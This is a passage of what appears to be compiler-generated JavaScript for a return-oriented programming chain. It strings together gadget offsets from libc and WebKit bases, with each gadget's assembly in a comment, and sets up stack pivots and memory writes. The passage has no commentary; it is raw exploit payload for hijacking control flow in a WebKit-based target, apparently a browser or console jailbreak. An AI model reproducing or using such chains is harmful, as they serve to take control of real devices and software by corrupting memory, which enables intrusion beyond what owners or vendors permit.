0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+426295, //mov [rdi], rax libc_base+764760, //pop rsi ropchain+256680, //L4737 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+731401, //mov rax, r8 libc_base+763368 //pop rcx ]); //L4737: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi //L4739: db([48, 0]); // 0x30 set_gadgets([ libc_base+501454, //add rax, rsi libc_base+764760, //pop rsi ropchain+256800, //L4742 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+384176, //mov rax, rdi libc_base+764760, //pop rsi ropchain+256784, //L4740 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+763368 //pop rcx ]); //L4740: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L4742: db([0, 0]); // 0x0 set_gadgets([ libc_base+225585, //mov rax, [rdi] libc_base+764760, //pop rsi ropchain+256944, //L4745 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+384176, //mov rax, rdi libc_base+764760, //pop rsi ropchain+256912, //L4743 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+764760, //pop rsi ropchain+256928, //L4744 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+763368 //pop rcx ]); //L4743: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L4744: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L4745: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi db([8, 0]); // 0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+764760, //pop rsi ropchain+257016, //L4747 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+763368 //pop rcx ]); //L4747: db([0, 0]); // 0x0 set_gadgets([ libc_base+426295, //mov [rdi], rax libc_base+764760, //pop rsi ropchain+257072, //L4748 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+763368 //pop rcx ]); //L4748: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi db([8, 0]); // 0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+426295, //mov [rdi], rax libc_base+764760, //pop rsi ropchain+257152, //L4750 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+731401, //mov rax, r8 libc_base+763368 //pop rcx ]); //L4750: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi //L4752: db([56, 0]); // 0x38 set_gadgets([ libc_base+501454, //add rax, rsi libc_base+764760, //pop rsi ropchain+257272, //L4755 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+384176, //mov rax, rdi libc_base+764760, //pop rsi ropchain+257256, //L4753 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+763368 //pop rcx ]); //L4753: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L4755: db([0, 0]); // 0x0 set_gadgets([ libc_base+225585, //mov rax, [rdi] libc_base+764760, //pop rsi ropchain+257416, //L4758 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+384176, //mov rax, rdi libc_base+764760, //pop rsi ropchain+257384, //L4756 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+764760, //pop rsi ropchain+257400, //L4757 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+763368 //pop rcx ]); //L4756: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L4757: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L4758: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi db([8, 0]); // 0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+426295, //mov [rdi], rax libc_base+764760, //pop rsi ropchain+257504, //L4760 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+764760 //pop rsi ]); //L4759: db([1, 0]); // 0x1 set_gadget(libc_base+759608,); //pop rax //L4760: db([0, 0]); // 0x0 set_gadgets([ libc_base+501454, //add rax, rsi libc_base+764760, //pop rsi ropchain+257560, //L4761 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+731401, //mov rax, r8 libc_base+763368 //pop rcx ]); //L4761: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi //L4763: db([56, 0]); // 0x38 set_gadgets([ libc_base+501454, //add rax, rsi webkit_base+20307877, //mov [rax], rcx libc_base+764760, //pop rsi ropchain+257640, //L4765 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+763368 //pop rcx ]); //L4765: db([0, 0]); // 0x0 set_gadgets([ libc_base+225585, //mov rax, [rdi] libc_base+764760 //pop rsi ]); db([4294967288, 4294967295]); // -0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+764760, //pop rsi ropchain+257744, //L4766 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2002592, //mov rax, [rsi] libc_base+764760, //pop rsi ropchain+257760, //L4767 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+763368 //pop rcx ]); //L4766: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L4767: db([0, 0]); // 0x0 set_gadgets([ libc_base+225585, //mov rax, [rdi] libc_base+764760 //pop rsi ]); db([4294967288, 4294967295]); // -0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+755660, //add rax, rcx libc_base+764760, //pop rsi ropchain+257848, //L4769 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+763368 //pop rcx ]); //L4769: db([0, 0]); // 0x0 set_gadgets([ libc_base+225585, //mov rax, [rdi] libc_base+764760, //pop rsi ropchain+257904, //L4770 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+763368 //pop rcx ]); //L4770: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi db([4294967288, 4294967295]); // -0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+764760, //pop rsi ropchain+257976, //L4773 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+763368 //pop rcx ]); //L4773: db([0, 0]); // 0x0 set_gadgets([ libc_base+225585, //mov rax, [rdi] libc_base+764760, //pop rsi ropchain+258032, //L4774 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+763368 //pop rcx ]); //L4774: db([0, 0]); // 0x0 set_gadgets([ webkit_base+1121481, //mov [rax], cl libc_base+225585, //mov rax, [rdi] libc_base+764760 //pop rsi ]); db([4294967288, 4294967295]); // -0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi //L4717: //L4659: //L4505: libc_base+764760, //pop rsi ropchain+258120, //L4776 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+731401, //mov rax, r8 libc_base+763368 //pop rcx ]); //L4776: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi //L4778: db([56, 0]); // 0x38 set_gadgets([ libc_base+501454, //add rax, rsi libc_base+764760, //pop rsi ropchain+258240, //L4781 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+384176, //mov rax, rdi libc_base+764760, //pop rsi ropchain+258224, //L4779 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+763368 //pop rcx ]); //L4779: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L4781: db([0, 0]); // 0x0 set_gadgets([ libc_base+225585, //mov rax, [rdi] libc_base+764760, //pop rsi ropchain+258384, //L4784 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+384176, //mov rax, rdi libc_base+764760, //pop rsi ropchain+258352, //L4782 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+764760, //pop rsi ropchain+258368, //L4783 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+763368 //pop rcx ]); //L4782: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L4783: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L4784: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi db([8, 0]); // 0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+426295, //mov [rdi], rax libc_base+853989, //mov rax, rcx libc_base+764760, //pop rsi ropchain+258480, //L4786 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+763368 //pop rcx ]); //L4785: db([32, 0]); // 0x20 set_gadget(webkit_base+3236123,); //pop r9 //L4786: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L4787: db([32, 0]); // 0x20 set_gadgets([ libc_base+848070, //shl rax, cl libc_base+848080, //shr rax, cl libc_base+764760, //pop rsi ropchain+258584, //L4788 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2002592, //mov rax, [rsi] libc_base+764760, //pop rsi ropchain+258600, //L4789 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+763368 //pop rcx ]); //L4788: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L4789: db([0, 0]); // 0x0 set_gadgets([ libc_base+225585, //mov rax, [rdi] libc_base+764760 //pop rsi ]); db([4294967288, 4294967295]); // -0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi webkit_base+6378709, //cmp rax, rcx ; sete al webkit_base+5168252, //setl al libc_base+226597, //movzx eax, al libc_base+764760, //pop rsi ropchain+258776, //L4791 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2002592, //mov rax, [rsi] libc_base+764760, //pop rsi ropchain+258792, //L4792 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+384176, //mov rax, rdi libc_base+764760, //pop rsi ropchain+258760, //L4790 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+3236123 //pop r9 ]); //L4790: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L4791: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L4792: db([0, 0]); // 0x0 set_gadgets([ webkit_base+15691302, //movsxd rax, edi libc_base+764760, //pop rsi ropchain+258904, //L4794 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2002592, //mov rax, [rsi] libc_base+764760, //pop rsi ropchain+258952, //L4797 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2757671, //mov rax, r9 libc_base+764760, //pop rsi ropchain+258920, //L4795 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+3236123 //pop r9 ]); //L4794: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L4795: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi //L4796: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L4797: db([0, 0]); // 0x0 set_gadgets([ webkit_base+21212296, //cmp rax, rsi ; sete al libc_base+226597, //movzx eax, al webkit_base+5507491, //shl rax, 3 libc_base+764760, //pop rsi ropchain+259064, //L4798+8 libc_base+501454, //add rax, rsi libc_base+501611, //mov rax, [rax] libc_base+764760, //pop rsi ropchain+259056, //L4798 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2757671, //mov rax, r9 libc_base+782311 //pop rsp ]); //L4798: db([0, 0]); // 0x0 set_gadgets([ ropchain+259080, //L4798+24 ropchain+261088, //L4793 libc_base+384176, //mov rax, rdi libc_base+764760, //pop rsi ropchain+259120, //L4799 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+3236123 //pop r9 ]); //L4799: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L4800: db([48, 0]); // 0x30 set_gadget(libc_base+144605,); //pop rdi //L4801: db([48, 0]); // 0x30 set_gadgets([ webkit_base+15691302, //movsxd rax, edi libc_base+764760, //pop rsi ropchain+259312, //L4805 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+764760, //pop rsi ropchain+259280, //L4803 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2757671, //mov rax, r9 libc_base+764760, //pop rsi ropchain+259296, //L4804 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+763368 //pop rcx ]); //L4802: db([24, 0]); // 0x18 set_gadget(webkit_base+3236123,); //pop r9 //L4803: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L4804: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L4805: db([0, 0]); // 0x0 set_gadgets([ libc_base+848070, //shl rax, cl libc_base+764760, //pop rsi ropchain+259368, //L4807 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+384176, //mov rax, rdi libc_base+144605 //pop rdi ]); //L4807: db([0, 0]); // 0x0 set_gadgets([ libc_base+478984, //sar edi, cl libc_base+764760, //pop rsi ropchain+259496, //L4809 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2002592, //mov rax, [rsi] libc_base+764760, //pop rsi ropchain+259512, //L4810 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2757671, //mov rax, r9 libc_base+764760, //pop rsi ropchain+259480, //L4808 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+763368 //pop rcx ]); //L4808: db([0, 0]); // 0x0 set_gadget(webkit_base+3236123,); //pop r9 //L4809: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L4810: db([0, 0]); // 0x0 set_gadgets([ webkit_base+15691302, //movsxd rax, edi libc_base+764760, //pop rsi ropchain+259608, //L4812 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2757671, //mov rax, r9 libc_base+764760, //pop rsi ropchain+259592, //L4811 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+144605 //pop rdi ]); //L4811: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L4812: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi db([8, 0]); // 0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+426295, //mov [rdi], rax libc_base+764760, //pop rsi ropchain+259688, //L4813 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+731401, //mov rax, r8 libc_base+763368 //pop rcx ]); //L4813: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi //L4815: db([48, 0]); // 0x30 set_gadgets([ libc_base+501454, //add rax, rsi libc_base+764760, //pop rsi ropchain+259808, //L4818 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+384176, //mov rax, rdi libc_base+764760, //pop rsi ropchain+259792, //L4816 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+763368 //pop rcx ]); //L4816: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L4818: db([0, 0]); // 0x0 set_gadgets([ libc_base+225585, //mov rax, [rdi] libc_base+764760, //pop rsi ropchain+259952, //L4821 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+384176, //mov rax, rdi libc_base+764760, //pop rsi ropchain+259920, //L4819 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+764760, //pop rsi ropchain+259936, //L4820 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+763368 //pop rcx ]); //L4819: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L4820: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L4821: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi db([8, 0]); // 0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+764760, //pop rsi ropchain+260024, //L4823 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+763368 //pop rcx ]); //L4823: db([0, 0]); // 0x0 set_gadgets([ libc_base+426295, //mov [rdi], rax libc_base+764760, //pop rsi ropchain+260080, //L4824 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+763368 //pop rcx ]); //L4824: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi db([8, 0]); // 0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+426295, //mov [rdi], rax libc_base+764760, //pop rsi ropchain+260160, //L4826 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+731401, //mov rax, r8 libc_base+763368 //pop rcx ]); //L4826: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi //L4828: db([56, 0]); // 0x38 set_gadgets([ libc_base+501454, //add rax, rsi libc_base+764760, //pop rsi ropchain+260280, //L4831 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+384176, //mov rax, rdi libc_base+764760, //pop rsi ropchain+260264, //L4829 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+763368 //pop rcx ]); //L4829: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L4831: db([0, 0]); // 0x0 set_gadgets([ libc_base+225585, //mov rax, [rdi] libc_base+764760, //pop rsi ropchain+260424, //L4834 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+384176, //mov rax, rdi libc_base+764760, //pop rsi ropchain+260392, //L4832 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+764760, //pop rsi ropchain+260408, //L4833 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+763368 //pop rcx ]); //L4832: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L4833: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L4834: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi db([8, 0]); // 0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+426295, //mov [rdi], rax libc_base+764760, //pop rsi ropchain+260512, //L4836 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+764760 //pop rsi ]); //L4835: db([1, 0]); // 0x1 set_gadget(libc_base+759608,); //pop rax //L4836: db([0, 0]); // 0x0 set_gadgets([ libc_base+501454, //add rax, rsi libc_base+764760, //pop rsi ropchain+260568, //L4837 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+731401, //mov rax, r8 libc_base+763368 //pop rcx ]); //L4837: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi //L4839: db([56, 0]); // 0x38 set_gadgets([ libc_base+501454, //add rax, rsi webkit_base+20307877, //mov [rax], rcx libc_base+764760, //pop rsi ropchain+260648, //L4841 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+763368 //pop rcx ]); //L4841: db([0, 0]); // 0x0 set_gadgets([ libc_base+225585, //mov rax, [rdi] libc_base+764760 //pop rsi ]); db([4294967288, 4294967295]); // -0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+764760, //pop rsi ropchain+260752, //L4842 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2002592, //mov rax, [rsi] libc_base+764760, //pop rsi ropchain+260768, //L4843 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+763368 //pop rcx ]); //L4842: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L4843: db([0, 0]); // 0x0 set_gadgets([ libc_base+225585, //mov rax, [rdi] libc_base+764760 //pop rsi ]); db([4294967288, 4294967295]); // -0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+755660, //add rax, rcx libc_base+764760, //pop rsi ropchain+260856, //L4845 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+763368 //pop rcx ]); //L4845: db([0, 0]); // 0x0 set_gadgets([ libc_base+225585, //mov rax, [rdi] libc_base+764760, //pop rsi ropchain+260912, //L4846 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+763368 //pop rcx ]); //L4846: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi db([4294967288, 4294967295]); // -0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+764760, //pop rsi ropchain+260984, //L4849 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+763368 //pop rcx ]); //L4849: db([0, 0]); // 0x0 set_gadgets([ libc_base+225585, //mov rax, [rdi] libc_base+764760, //pop rsi ropchain+261040, //L4850 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+763368 //pop rcx ]); //L4850: db([0, 0]); // 0x0 set_gadgets([ webkit_base+1121481, //mov [rax], cl libc_base+225585, //mov rax, [rdi] libc_base+764760 //pop rsi ]); db([4294967288, 4294967295]); // -0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi //L4793: //L4111: libc_base+764760, //pop rsi ropchain+261128, //L4852 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+731401, //mov rax, r8 libc_base+763368 //pop rcx ]); //L4852: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi //L4854: db([56, 0]); // 0x38 set_gadgets([ libc_base+501454, //add rax, rsi libc_base+764760, //pop rsi ropchain+261248, //L4857 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+384176, //mov rax, rdi libc_base+764760, //pop rsi ropchain+261232, //L4855 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+763368 //pop rcx ]); //L4855: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L4857: db([0, 0]); // 0x0 set_gadgets([ libc_base+225585, //mov rax, [rdi] libc_base+764760, //pop rsi ropchain+261392, //L4860 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+384176, //mov rax, rdi libc_base+764760, //pop rsi ropchain+261360, //L4858 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+764760, //pop rsi ropchain+261376, //L4859 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+763368 //pop rcx ]); //L4858: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L4859: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L4860: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi db([8, 0]); // 0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+426295, //mov [rdi], rax libc_base+853989, //mov rax, rcx libc_base+764760, //pop rsi ropchain+261488, //L4862 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+763368 //pop rcx ]); //L4861: db([32, 0]); // 0x20 set_gadget(webkit_base+3236123,); //pop r9 //L4862: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L4863: db([32, 0]); // 0x20 set_gadgets([ libc_base+848070, //shl rax, cl libc_base+848080, //shr rax, cl libc_base+764760, //pop rsi ropchain+261592, //L4864 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2002592, //mov rax, [rsi] libc_base+764760, //pop rsi ropchain+261608, //L4865 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+763368 //pop rcx ]); //L4864: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L4865: db([0, 0]); // 0x0 set_gadgets([ libc_base+225585, //mov rax, [rdi] libc_base+764760 //pop rsi ]); db([4294967288, 4294967295]); // -0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi webkit_base+6378709, //cmp rax, rcx ; sete al webkit_base+5168252, //setl al libc_base+226597, //movzx eax, al libc_base+764760, //pop rsi ropchain+261784, //L4867 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2002592, //mov rax, [rsi] libc_base+764760, //pop rsi ropchain+261800, //L4868 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+384176, //mov rax, rdi libc_base+764760, //pop rsi ropchain+261768, //L4866 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+3236123 //pop r9 ]); //L4866: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L4867: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L4868: db([0, 0]); // 0x0 set_gadgets([ webkit_base+15691302, //movsxd rax, edi libc_base+764760, //pop rsi ropchain+261912, //L4870 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2002592, //mov rax, [rsi] libc_base+764760, //pop rsi ropchain+261960, //L4873 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2757671, //mov rax, r9 libc_base+764760, //pop rsi ropchain+261928, //L4871 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+3236123 //pop r9 ]); //L4870: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L4871: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi //L4872: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L4873: db([0, 0]); // 0x0 set_gadgets([ webkit_base+21212296, //cmp rax, rsi ; sete al libc_base+226597, //movzx eax, al webkit_base+5507491, //shl rax, 3 libc_base+764760, //pop rsi ropchain+262072, //L4874+8 libc_base+501454, //add rax, rsi libc_base+501611, //mov rax, [rax] libc_base+764760, //pop rsi ropchain+262064, //L4874 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2757671, //mov rax, r9 libc_base+782311 //pop rsp ]); //L4874: db([0, 0]); // 0x0 set_gadgets([ ropchain+262088, //L4874+24 ropchain+271584, //L4869 libc_base+764760, //pop rsi ropchain+262128, //L4875 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+731401, //mov rax, r8 libc_base+763368 //pop rcx ]); //L4875: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi //L4877: db([64, 0]); // 0x40 set_gadgets([ libc_base+501454, //add rax, rsi libc_base+764760, //pop rsi ropchain+262248, //L4880 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+384176, //mov rax, rdi libc_base+764760, //pop rsi ropchain+262232, //L4878 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+763368 //pop rcx ]); //L4878: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L4880: db([0, 0]); // 0x0 set_gadgets([ libc_base+223440, //mov al, [rdi] libc_base+764760, //pop rsi ropchain+262408, //L4884 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+384176, //mov rax, rdi libc_base+764760, //pop rsi ropchain+262376, //L4882 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+764760, //pop rsi ropchain+262392, //L4883 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+763368 //pop rcx ]); //L4881: db([24, 0]); // 0x18 set_gadget(webkit_base+3236123,); //pop r9 //L4882: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L4883: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L4884: db([0, 0]); // 0x0 set_gadgets([ libc_base+848070, //shl rax, cl libc_base+764760, //pop rsi ropchain+262464, //L4886 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+384176, //mov rax, rdi libc_base+144605 //pop rdi ]); //L4886: db([0, 0]); // 0x0 set_gadgets([ libc_base+478984, //sar edi, cl libc_base+764760, //pop rsi ropchain+262592, //L4888 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2002592, //mov rax, [rsi] libc_base+764760, //pop rsi ropchain+262608, //L4889 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2757671, //mov rax, r9 libc_base+764760, //pop rsi ropchain+262576, //L4887 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+763368 //pop rcx ]); //L4887: db([0, 0]); // 0x0 set_gadget(webkit_base+3236123,); //pop r9 //L4888: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L4889: db([0, 0]); // 0x0 set_gadgets([ webkit_base+15691302, //movsxd rax, edi libc_base+764760, //pop rsi ropchain+262768, //L4893 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+764760, //pop rsi ropchain+262736, //L4891 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2757671, //mov rax, r9 libc_base+764760, //pop rsi ropchain+262752, //L4892 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+763368 //pop rcx ]); //L4890: db([24, 0]); // 0x18 set_gadget(webkit_base+3236123,); //pop r9 //L4891: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L4892: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L4893: db([0, 0]); // 0x0 set_gadgets([ libc_base+848070, //shl rax, cl libc_base+764760, //pop rsi ropchain+262824, //L4895 